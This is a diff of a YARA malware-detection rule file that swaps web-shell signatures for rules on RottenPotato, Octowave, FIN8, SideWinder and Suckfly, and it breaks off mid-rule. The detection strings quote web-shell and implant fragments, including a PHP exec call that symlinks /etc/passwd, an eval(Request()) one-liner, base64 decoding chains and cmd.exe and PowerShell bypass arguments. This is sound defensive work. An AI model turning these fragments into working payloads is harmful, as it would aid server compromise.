+		reference = "https://github.com/foxglovesec/RottenPotato"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rottenpotato.yar#L10-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "348ccdf997965fbea791d835f1dd4e2c16d37a17ff4195e585fa4226f18faad6"
-		score = 75
+		logic_hash = "79d2dfd5c2cfd12301c1924dce2ca2a2c3cc070565671c3e0cd69123d2245b1c"
+		score = 90
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b1733cbb0eb3d440c4174cc67ca693ba92308ded5fc1069ed650c3c78b1da4bc"
+		hash1 = "59cdbb21d9e487ca82748168682f1f7af3c5f2b8daee3a09544dd58cbf51b0d5"
 
 	strings:
-		$s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii
-		$s2 = "input[type=text], input[type=password]{" fullword ascii
+		$x1 = "Potato.exe -ip <ip>" fullword wide
+		$x2 = "-enable_httpserver true -enable_spoof true" fullword wide
+		$x3 = "/C schtasks.exe /Create /TN omg /TR" fullword wide
+		$x4 = "-enable_token true -enable_dce true" fullword wide
+		$x5 = "DNS lookup succeeds - UDP Exhaustion failed!" fullword wide
+		$x6 = "DNS lookup fails - UDP Exhaustion worked!" fullword wide
+		$x7 = "\\obj\\Release\\Potato.pdb" ascii
+		$x8 = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";" fullword wide
+		$s1 = "\"C:\\Windows\\System32\\cmd.exe\" /K start" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x6c3c and filesize < 80KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Webshell_E8Eaf8Da94012E866E51547Cd63Bb996379690Bf : FILE
+rule SIGNATURE_BASE_Octowave_Loader_03_2025 : FILE
 {
 	meta:
-		description = "Detects a web shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8fda9b9f-9a72-5123-91d7-0d0aec9e17bc"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9611-L9626"
+		description = "Detects opcodes found in Octowave loader DLLs and WAV steganography files"
+		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
+		id = "d583c416-be20-5fcf-848e-edd037e3b0d4"
+		date = "2025-03-19"
+		modified = "2025-03-21"
+		reference = "https://yaratoolkit.securitybreak.io/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_octowave_loader_mar25.yar#L1-L285"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "044491f0b07ef606aa76e70a07d161565f9cecf73e8f9f8db63cacc1c475b056"
+		logic_hash = "266568d5f0f95cc805a833745a9e63689234ae927c2903230438c080f7ec2e56"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "027544baa10259939780e97dc908bd43f0fb940510119fc4cce0883f3dd88275"
+		hash1 = "0504BFBACB6E10B81196F625F2FE37B33500E7BF65FD82D3510A2B178C6CD5BD"
+		hash2 = "3A2DB0CB9EE01549A6B660D58115D112D36A744D65705394B54D7D95287C7A74"
+		hash3 = "EB50D06057FE123D6E9F7A76D3D1A4BC5307E8F15D017BE8F6031E92136CF36A"
+		hash4 = "24715920E749B014BA05F74C96627A27355C5860A14461C106AA48A7ABA371EA"
 
 	strings:
-		$x1 = "@exec('./bypass/ln -s /etc/passwd 1.php');" fullword ascii
-		$x2 = "echo \"<iframe src=mysqldumper/index.php width=100% height=100% frameborder=0></iframe> \";" fullword ascii
-		$x3 = "@exec('tar -xvf mysqldumper.tar.gz');" fullword ascii
+		$opcode_1 = {
+			55
+			8B EC
+			56
+			57
+			8B D1
+			33 C0
+			8B FA
+			6A 06
+			59
+			AB
+			AB
+			AB
+			AB
+			8B 45 08
+			8B FA
+			83 62 10 00
+			8B F0
+			83 62 14 00
+			F3 A5
+			83 60 10 00
+		}
+		$opcode_2 = {
+			55
+			8B EC
+			8B 55 ??
+			56
+			8B F1
+			8B 46 ??
+			8B 4E ??
+			2B C1
+			3B D0
+			77 ??
+			83 7E ?? 07
+			53
+			8D 1C 11
+			57
+			89 5E ??
+			8B FE
+			76 ??
+			8B 3E
+			8D 04 12
+			50
+			FF 75 ??
+			8D 0C 4F
+			51
+			E8 ?? ?? ?? ??
+			83 C4 0C
+			33 C0
+			66 89 04 5F
+			8B C6
+			5F
+			5B
+			EB ??
+			52
+			FF 75 ??
+			8B CE
+			FF 75 ??
+			52
+			E8 ?? ?? ?? ??
+			5E
+			5D
+			C2 08 00
+		}
+		$opcode_3 = {
+			55
+			8B EC
+			8B 4D 08
+			83 C9 ??
+			56
+			3B 4D 10
+			77 1C
+			8B 75 0C
+			8B D6
+			8B 45 10
+			D1 EA
+			2B C2
+			3B F0
+			77 0C
+			8D 04 32
+			3B C8
+			0F 42 C8
+			8B C1
+			EB 03
+		}
+		$opcode_4 = {
+			56
+			8B F1
+			8B 46 14
+			83 F8 ??
+			76 ??
+		}
+		$opcode_5 = {
+			50
+			FF 36
+			E8 ?? ?? ?? ??
+			59
+			59
+			83 66 ?? 00
+		}
+		$opcode_6 = {
+			C7 46 14 ?? 00 00 00
+			66 89 06
+			5E
+			C3
+		}
+		$opcode_7 = {
+			55
+			8B EC
+			51
+			51
+			A1 ?? ?? ?? ??
+			33 C5
+			89 45 FC
+			8B 4D 0C
+			8B 45 08
+			89 45 F8
+			81 F9 00 10 00 00
+			72 ??
+			8D 45 0C
+			50
+			8D 45 F8
+			50
+			E8 ?? ?? ?? ??
+			8B 45 F8
+			59
+			59
+		}
 
 	condition:
-		( uint16( 0 ) == 0x213c and filesize < 100KB and 1 of ( $x* ) ) or ( 2 of them )
+		( uint16( 0 ) == ( 0x5a4d ) or uint32( 0 ) == 0x46464952 ) and filesize < 50000KB and all of them
 }
-rule SIGNATURE_BASE_Unknown_0F06C5D1B32F4994C3B3Abf8Bb76D5468F105167 : FILE
+rule SIGNATURE_BASE_Octowave_Loader_Supporting_File_03_2025 : FILE
 {
 	meta:
-		description = "Detects a web shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "efd09da2-f232-5a21-99c8-dc2bf00baa73"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9628-L9643"
+		description = "Detects supporting file used by Octowave loader containing hardcoded values"
+		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
+		id = "2c81c8b8-4b4d-55c9-9285-556e8b5303bd"
+		date = "2025-03-19"
+		modified = "2025-03-21"
+		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_octowave_loader_mar25.yar#L287-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f4bdf8aecd527335c29a8e964c7d8688c3e77419595d3fd10a6cf3704711816"
+		logic_hash = "42abd38e704a17ef81b423829c2dd356749873a5d036e43cc2746debfb3f5434"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6362372850ac7455fa9461ed0483032a1886543f213a431f81a2ac76d383b47e"
+		hash1 = "C4CBAA7E4521FA0ED9CC634C5E2BACBF41F46842CA4526B7904D98843A7E9DB9"
+		hash2 = "F5CFB2E634539D5DC7FFE202FFDC422EF7457100401BA1FBC21DD05558719865"
+		hash3 = "56F1967F7177C166386D864807CDF03D5BBD3F118A285CE67EA226D02E5CF58C"
+		hash4 = "11EE5AD8A81AE85E5B7DDF93ADF6EDD20DE8460C755BF0426DFCBC7F658D7E85"
+		hash5 = "D218B65493E4D9D85CBC2F7B608F4F7E501708014BC04AF27D33D995AA54A703"
+		hash6 = "0C112F9DFE27211B357C74F358D9C144EA10CC0D92D6420B8742B72A65562C5A"
 
 	strings:
-		$s1 = "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/lola.php\" ;" fullword ascii
-		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
-		$s3 = "fwrite($fp,base64_decode('" ascii
+		$unique_key = {1D 1C 1F 1E 01 01 03 02 05 04 07 06 09 D4 0E 0A 0D 0C 0F 0E 31 30 31 32 35 34 36 36 39 38 DC 3F 3D 3C 3E}
+		$unique_string = "MLONqpsrutwvyx"
+		$unique_string2 = "A@CBEDGFIHKJMLONqpsrutwvyx"
 
 	condition:
-		( uint16( 0 ) == 0x6324 and filesize < 2KB and all of them )
+		uint16( 0 ) != 0x5a4d and filesize < 10000KB and all of them
 }
-rule SIGNATURE_BASE_Wsoshell_0Bbebaf46F87718Caba581163D4Beed56Ddf73A7 : FILE
+rule SIGNATURE_BASE_Shellcode_Apihashing_FIN8_1
 {
 	meta:
-		description = "Detects a web shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "92165645-5392-588d-ba2a-5ef6b7499a5a"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9645-L9659"
+		description = "Detects FIN8 Shellcode APIHashing"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "bca5601c-2998-545b-8dd0-ec3c861e6291"
+		date = "2021-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin8.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf5090fb909fea690c8a2af3cca35136eda3b9773976189158c25fb8877cc266"
+		logic_hash = "5d47119a588aa69b3e241618d6dbb9df6117a6751bbff39a1f95340bc26611a7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d053086907aed21fbb6019bf9e644d2bae61c63563c4c3b948d755db3e78f395"
+		tags = ""
 
 	strings:
-		$s8 = "$default_charset='Wi'.'ndo.'.'ws-12'.'51';" fullword ascii
-		$s9 = "$mosimage_session = \"" fullword ascii
+		$APIHashing32bit1 = {81 F7 99 5D 52 69 81 F3 30 D7 00 AB}
+		$APIHashing32bit2 = {68 F2 55 03 88 68 65 19 6D 1E}
+		$APIHashing32bit3 = {68 9B 59 27 21 C1 E9 17 33 4C 24 10 68 37 5C 32 F4}
+		$APIHashing64bit1 = {49 BF 65 19 6D 1E F2 55 03 88 49 BE 37 5C 32 F4 9B 59 27 21}
+		$APIHashing64bit2 = {48 B8 99 5D 52 69 30 D7 00 AB}
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 300KB and all of them )
+		all of ( $APIHashing32bit* ) or all of ( $APIHashing64bit* )
 }
-rule SIGNATURE_BASE_Webshell_Generic_1609_A : FILE
+rule SIGNATURE_BASE_APT_Sidewinder_NET_Loader_Aug_2020_1_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4b7db4db-8699-5b4d-ab90-ce79f1160984"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9661-L9676"
+		description = "Detected the NET loader used by SideWinder group (August 2020)"
+		author = "Arkbird_SOLG"
+		id = "61d96e2a-3a43-586f-85bc-a2c53b1318e6"
+		date = "2020-08-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sidewinder.yar#L4-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e5a4bba3a7b1c712203fcc8b85e4089b0ff18a26e96f5a04529616dbfb9de651"
+		logic_hash = "5ee7029143c589f26e6c325e163bfac85507c950f09778bd51ec2bdf4d4263fa"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "c817a490cfd4d6377c15c9ac9bcfa136f4a45ff5b40c74f15216c030f657d035"
-		hash3 = "69b9d55ea2eb4a0d9cfe3b21b0c112c31ea197d1cb00493d1dddc78b90c5745e"
+		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
 
 	strings:
-		$s1 = "return $qwery45234dws($b);" fullword ascii
+		$a1 = "DUSER.dll" fullword wide
+		$s1 = "UHJvZ3JhbQ==" fullword wide
+		$s2 = "U3RhcnQ=" fullword wide
+		$s3 = ".tmp           " fullword wide
+		$s4 = "FileRipper" fullword ascii
+		$s5 = "copytight @" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 4KB and $a1 and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_Nishang_Webshell : FILE
+rule SIGNATURE_BASE_APT_MAL_Sidewinder_Implant : FILE
 {
 	meta:
-		description = "Detects a ASPX web shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "785e6da7-097e-598b-9799-ffe43738d718"
-		date = "2016-09-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/samratashok/nishang"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9678-L9693"
+		description = "Detects SideWinder final payload"
+		author = "AT&T Alien Labs"
+		id = "3a420c9c-7821-5405-8d4d-6931d0f311ba"
+		date = "2020-08-25"
+		modified = "2023-12-05"
+		reference = "https://cybersecurity.att.com/blogs/labs-research/a-global-perspective-of-the-sidewinder-apt"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sidewinder.yar#L24-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b8a3c8e80a4e41e556e2d65df4126d84723ded6ca623302afc4cc328bded346c"
+		logic_hash = "bfad86dbdc04463e7e4cc126fd05fc9107617a7ea1bd3f283c0e0170862bd59b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c568238dcf1e30d55a398579a4704ddb8196b685"
 
 	strings:
-		$s1 = "psi.Arguments = \"-noninteractive \" + \"-executionpolicy bypass \" + arg;" ascii
-		$s2 = "output.Text += \"\nPS> \" + console.Text + \"\n\" + do_ps(console.Text);" ascii
-		$s3 = "<title>Antak Webshell</title>" fullword ascii
-		$s4 = "<asp:Button ID=\"executesql\" runat=\"server\" Text=\"Execute SQL Query\"" ascii
+		$code = { 1B 30 05 00 C7 00 00 00 00 00 00 00 02 28 03 00
+               00 06 7D 12 00 00 04 02 02 FE 06 23 00 00 06 73
+               5B 00 00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A
+               7D 13 00 00 04 02 02 FE 06 24 00 00 06 73 5B 00
+               00 0A 14 20 88 13 00 00 15 73 5C 00 00 0A 7D 15
+               00 00 04 02 7B 12 00 00 04 6F 0E 00 00 06 2C 1D
+               02 28 1F 00 00 06 02 7B 12 00 00 04 16 6F 0F 00
+               00 06 02 7B 12 00 00 04 6F 06 00 00 06 02 7B 12
+               00 00 04 6F 10 00 00 06 2C 23 02 28 20 00 00 06
+               02 28 21 00 00 06 02 7B 12 00 00 04 16 }
+		$strings = {
+         2E 00 73 00 69 00 66 00 00 09 2E 00 66 00 6C 00
+         63 00 00 1B 73 00 65 00 6C 00 65 00 63 00 74 00
+         65 00 64 00 46 00 69 00 6C 00 65 00 73
+      }
 
 	condition:
-		( uint16( 0 ) == 0x253C and filesize < 100KB and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_PHP_Webshell_1_Feb17 : FILE
+rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_1 : FILE
 {
 	meta:
-		description = "Detects a simple cloaked PHP web shell"
+		description = "Detects Suckfly Nidiran Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eedf87c9-2dab-530d-b5d8-a4c2ebc87821"
-		date = "2017-02-28"
-		modified = "2025-11-03"
-		reference = "https://isc.sans.edu/diary/Analysis+of+a+Simple+PHP+Backdoor/22127"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9705-L9726"
+		id = "1abc596a-5fb1-55f9-b72d-022bfc6d10c7"
+		date = "2018-01-28"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_suckfly.yar#L14-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8576b20ec3f81b3ef0aa5a508c94e07d591d68767cb4598ad10778b4305915d"
+		logic_hash = "bf617259df00b16272caffa8f1ffcf8d29cb98cb6ab85ca52e0bb0706f0cd5b0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ac7d7c676f58ebfa5def9b84553f00f283c61e4a310459178ea9e7164004e734"
 
 	strings:
-		$h1 = "<?php ${\"\\x" ascii
-		$x1 = "\";global$auth;function sh_decrypt_phase($data,$key){${\"" ascii
-		$x2 = "global$auth;return sh_decrypt_phase(sh_decrypt_phase($" ascii
-		$x3 = "]}[\"\x64\"]);}}echo " ascii
-		$x4 = "\"=>@phpversion(),\"\\x" ascii
-		$s1 = "$i=Array(\"pv\"=>@phpversion(),\"sv\"" ascii
-		$s3 = "$data = @unserialize(sh_decrypt(@base64_decode($data),$data_key));" ascii
+		$s1 = "WriteProcessMemory fail at %d " fullword ascii
+		$s2 = "CreateRemoteThread fail at %d " fullword ascii
+		$s3 = "CreateRemoteThread Succ" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x68703f3c and ( $h1 at 0 and 1 of them ) or 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Webshell_Tiny_JSP_2 : FILE
+rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_2 : FILE
 {
 	meta:
-		description = "Detects a tiny webshell - chine chopper"
+		description = "Detects Suckfly Nidiran Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b628c4f9-eb07-592d-834a-5c94e41987da"
-		date = "2015-12-05"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9728-L9740"
+		id = "b090079d-1c22-5931-a25b-e960343a610f"
+		date = "2018-01-28"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_suckfly.yar#L31-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6fd514df9d53293a8cfd4b9c807f993558e39979592aa221f18cd76079c00fb7"
-		score = 100
+		logic_hash = "2e4f6a920e063113a9ff252869e1c2ebdf5a2495b4adb1edaf9500904234f362"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b53a316a03b46758cb128e5045dab2717cb36e7b5eb1863ce2524d4f69bc2cab"
+		hash2 = "eaee2bf83cf90d35dab8a4711f7a5f2ebf9741007668f3746995f4564046fbdf"
 
 	strings:
-		$s1 = "<%eval(Request(" nocase
+		$x1 = "WorkDll.dll" fullword ascii
+		$x2 = "%userprofile%\\Security Center\\secriter.dll" fullword ascii
+		$s1 = "DLL_PROCESS_ATTACH is called" fullword ascii
+		$s2 = "Support Security Accounts Manager For Microsoft Windows.If this service is stopped, any services that depended on it will fail t" ascii
+		$s3 = "before CreateRemoteThread" fullword ascii
+		$s4 = "CreateRemoteThread Succ" fullword ascii
+		$s5 = "Microsoft Security Accounts Manager" fullword ascii
+		$s6 = "DoRunRemote" fullword ascii
+		$s7 = "AutoRunFun" fullword ascii
+		$s8 = "ServiceMain is called" fullword ascii
+		$s9 = "DllRegisterServer is called" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 40 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Wordpress_Config_Webshell_Preprend : FILE
-{
-	meta:
-		description = "Webshell that uses standard Wordpress wp-config.php file and appends the malicious code in front of it"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2a432c53-5dee-5a2e-9ccf-9e5d52713af9"
-		date = "2017-06-25"
-		modified = "2025-11-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9752-L9774"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "97d7b85fa191380fe8b26ea60c8735a8f7179acc3a496ff0fc0dc5eefde2fe8a"
-		score = 65
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$x1 = " * @package WordPress" fullword ascii
-		$s1 = "define('DB_NAME'," ascii
-		$s2 = "require_once(ABSPATH . 'wp-settings.php');" ascii
-		$fp1 = "iThemes Security Config" ascii
 
-	condition:
-		uint32( 0 ) == 0x68703f3c and filesize < 400KB and $x1 and all of ( $s* ) and not $x1 in ( 0 .. 1000 ) and not 1 of ( $fp* )
-}
-rule SIGNATURE_BASE_PAS_Webshell_Encoded : FILE
+rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_3 : FILE
 {
 	meta:
-		description = "Detects a PAS webshell"
+		description = "Detects Suckfly Nidiran Trojan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6cb547ad-7a97-5c3d-83e1-114ea798ddb8"
-		date = "2017-07-11"
-		modified = "2025-11-03"
-		reference = "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9785-L9820"
+		id = "d9daf7e4-2cfa-50c9-84d2-c971734abe5e"
+		date = "2018-01-28"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_suckfly.yar#L61-L88"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59f4f8caa60c2367b46f6af1aefa62e03e228b382ff58be3a27dad527a685eca"
-		score = 80
+		logic_hash = "4fddb55999bbbeecd92863219e878c840640e4d17008cb789a255528ef3fac9c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2022e1114b162e79e44d974fd310d53e1bbdd8cb4f217553c1227cafed78855"
+		hash2 = "47731c9d985ebc2bd7227fced3cc44c6d72e29b52f76fccbdaddd76cc3450706"
 
 	strings:
-		$head1 = "<?php $____=" fullword ascii
-		$head2 = "'base'.(32*2).'"
-		$enc1 = "isset($_COOKIE['___']" ascii
-		$enc2 = "if($___!==NULL){" ascii
-		$enc3 = ").substr(md5(strrev($" ascii
-		$enc4 = "]))%256);$" ascii
-		$enc5 = "]))@setcookie('" ascii
-		$enc6 = "]=chr(( ord($_" ascii
-		$x1 = { 3D 0A 27 29 29 3B 69 66 28 69 73 73 65 74 28 24 5F 43 4F 4F 4B 49 45 5B 27 }
-		$foot1 = "value=\"\"/><input type=\"submit\" value=\"&gt;\"/></form>"
-		$foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>"
+		$x1 = "RUN SHELLCODE FAIL" fullword ascii
+		$x2 = "RUN PROCESS FAILD!" fullword ascii
+		$x3 = "DOWNLOAD FILE FAILD" fullword ascii
+		$x4 = "MODIFYCONFIG FAIL!" fullword ascii
+		$x5 = "GetFileAttributes FILE FAILD" fullword ascii
+		$x6 = "MODIFYCONFIG SUCC!" fullword ascii
+		$s1 = "cmd.exe /c %s" fullword ascii
+		$s2 = "error to create pipe!" fullword ascii
+		$s3 = "%s\\%08x.exe" fullword ascii
 
 	condition:
-		( uint32( 0 ) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in ( 0 .. 20 ) or 1 of ( $x* ) ) ) or $foot1 at ( filesize -52 ) or $foot2 at ( filesize -44 )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ae0f4ebf7e8ce91d6548318a3cf82b7a" or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_ALFA_SHELL : FILE
+rule SIGNATURE_BASE_Getuserspns_VBS
 {
 	meta:
-		description = "Detects web shell often used by Iranian APT groups"
+		description = "Auto-generated rule - file GetUserSPNs.vbs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f0be44ec-bff0-5d01-aabd-df7aa05383e3"
-		date = "2017-09-21"
-		modified = "2025-11-03"
-		reference = "Internal Research - APT33"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9832-L9850"
+		id = "5576c1b9-4670-52c5-b23c-64adcc8709de"
+		date = "2016-05-21"
+		modified = "2023-12-05"
+		reference = "https://github.com/skelsec/PyKerberoast"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_kerberoast.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "651568b2b95c9e5c2b60fb3245e5afe4290235979e3df15bad96ccd08ae234ef"
+		logic_hash = "ece81cd717fed6ca1f9053384911fd59462b6f3b01210ceeb037ba3da2f7a318"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a39d8823d54c55e60a7395772e50d116408804c1a5368391a1e5871dbdc83547"
+		hash1 = "8dcb568d475fd8a0557e70ca88a262b7c06d0f42835c855b52e059c0f5ce9237"
 
 	strings:
-		$x1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')" ascii
-		$x2 = "#solevisible@gmail.com" fullword ascii
-		$x3 = "'login_page' => '500',//gui or 500 or 403 or 404" fullword ascii
-		$x4 = "$GLOBALS['__ALFA__']" fullword ascii
-		$x5 = "if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')" ascii
-		$f1 = { 76 2F 38 76 2F 36 76 2F 2B 76 2F 2F 66 38 46 27 29 3B 3F 3E 0D 0A }
+		$s1 = "Wscript.Echo \"User Logon: \" & oRecordset.Fields(\"samAccountName\")" fullword ascii
+		$s2 = "Wscript.Echo \" USAGE:        \" & WScript.ScriptName & \" SpnToFind [GC Servername or Forestname]\"" fullword ascii
+		$s3 = "strADOQuery = \"<\" + strGCPath + \">;(&(!objectClass=computer)(servicePrincipalName=*));\" & _" fullword ascii
 
 	condition:
-		( filesize < 900KB and 2 of ( $x* ) or $f1 at ( filesize -22 ) )
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_FOPO_Obfuscation_APT_ON_Nov17_1 : FILE
+rule SIGNATURE_BASE_Getuserspns_PS1
 {
 	meta:
